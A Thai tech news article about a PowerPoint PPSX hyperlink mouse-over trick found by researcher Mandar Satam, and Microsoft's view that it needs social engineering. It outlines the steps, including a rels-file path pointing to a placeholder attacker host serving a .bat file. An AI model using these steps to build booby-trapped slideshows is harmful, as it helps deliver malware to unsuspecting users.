พบช่องโหว่ใน PowerPoint แค่เอาเมาส์ชี้เหนือลิงก์ ก็มีสิทธิ์ติดมัลแวร์

เมื่อ :
ผู้เข้าชม : 1,657
เขียนโดย :
image_big
image_big
เมื่อ :
ผู้เข้าชม : 1,657
เขียนโดย :

Mandar Satam นักวิจัยความปลอดภัยอิสระ ค้นพบช่องโหว่ที่สามารถใช้โจมตีผ่านไฟล์ PowerPoint ได้ อย่างไรก็ตาม ทาง Microsoft กลับมองว่านี่ไม่ใช่ช่องโหว่แต่อย่างใด 

จากผลการวิจัยของ Satam เขาพบว่า ในระบบการทำงานของ PowerPoint นั้น สามารถที่จะกำหนด "รูปแบบการกระทำ" ที่จะเกิดขึ้นเมื่อเอาเมาส์ไปชี้เหนือ Hypertext link ได้ โดยการสร้างไฟล์สไลด์ขึ้นมาในรูปแบบของ Open XML Slide Show ที่เรียกว่า PPSX มันเป็นไฟล์ PowerPoint ชนิดหนึ่งที่ออกแบบมาเพื่อใช้ในการเล่นพรีเซนเทชันเพียงอย่างเดียว ไม่สามารถแก้ไขได้ จากนั้นก็ตั้งค่า "Action" ของ HyperLink ให้เป็น "Other file"

หลังจากนั้นก็เข้าไปแก้ไขไฟล์ PPSX ที่สร้างขึ้นมาด้วยโปรแกรม ZIP เปลี่ยนค่า rID ที่อยู่ใน "\ppt\slides_rels\slide1.xml.rels" ให้เชื่อมต่อไปยัง "file:///[Attacker_IP]\webdavfolder\file.bat"

เท่านี้เมื่อผู้ใช้เอาเมาส์ไปลอยชี้เหนือลิงก์ใน PowerPoint จากนั้นทันทีที่ผู้ใช้เอาเมาส์ไปชี้เหนือลิงก์ หน้าต่าง Pop-ups จะเด้งขึ้นมาทันที หากผู้ใช้คลิกตกลงไป แฮกเกอร์ก็จะสามารถติดตั้งมัลแวร์ลงในเครื่องได้ทันที

ตัวอย่างการโจมตี

พบช่องโหว่ใน PowerPoint แค่เอาเมาส์ชี้เหนือลิงก์ ก็มีสิทธิ์ติดมัลแวร์

แล้วทำไม Microsoft มองว่ามันไม่ใช่ช่องโหว่ล่ะ?

Satam ได้แจ้งปัญหานี้ไปยัง Microsoft แล้ว แต่ได้รับการตอบกลับมาว่า "ช่องโหว่นี้จำเป็นต้องอาศัย Social engineering ในการหลอกให้เหยื่อดาวน์โหลดไฟล์มา แถมยังต้องคลิกยอมรับหน้าต่างแจ้งเตือนอีกครั้ง มันจึงยังไม่อันตรายถึงระดับที่ต้องให้ความสำคัญ 

อย่างไรก็ตาม ทาง Satam มองว่าช่องโหว่นี้อันตรายอยู่ดี เพราะหน้าต่างแจ้งเตือนสามารถปรับแต่ง GUI ให้แสดงข้อความแบบไหนก็ได้ตามที่แฮกเกอร์ต้องการ อย่างเช่น “Windows Update.bat” หรือ “Loading.. Please"

ส่วนตัวผมเองก็มองว่ามันไม่ใช่ปัญหาสักเท่าไหร่ หากเราไม่ดาวน์โหลดไฟล์ และคลิกอย่างมั่วซั่วยังไงก้ไม่มีทางถูกโจมตีแน่นอน แล้วคุณผู้อ่านล่ะ คิดว่านี่เป็นปัญหาหรือเปล่า?

ต้นฉบับ :
ที่มา :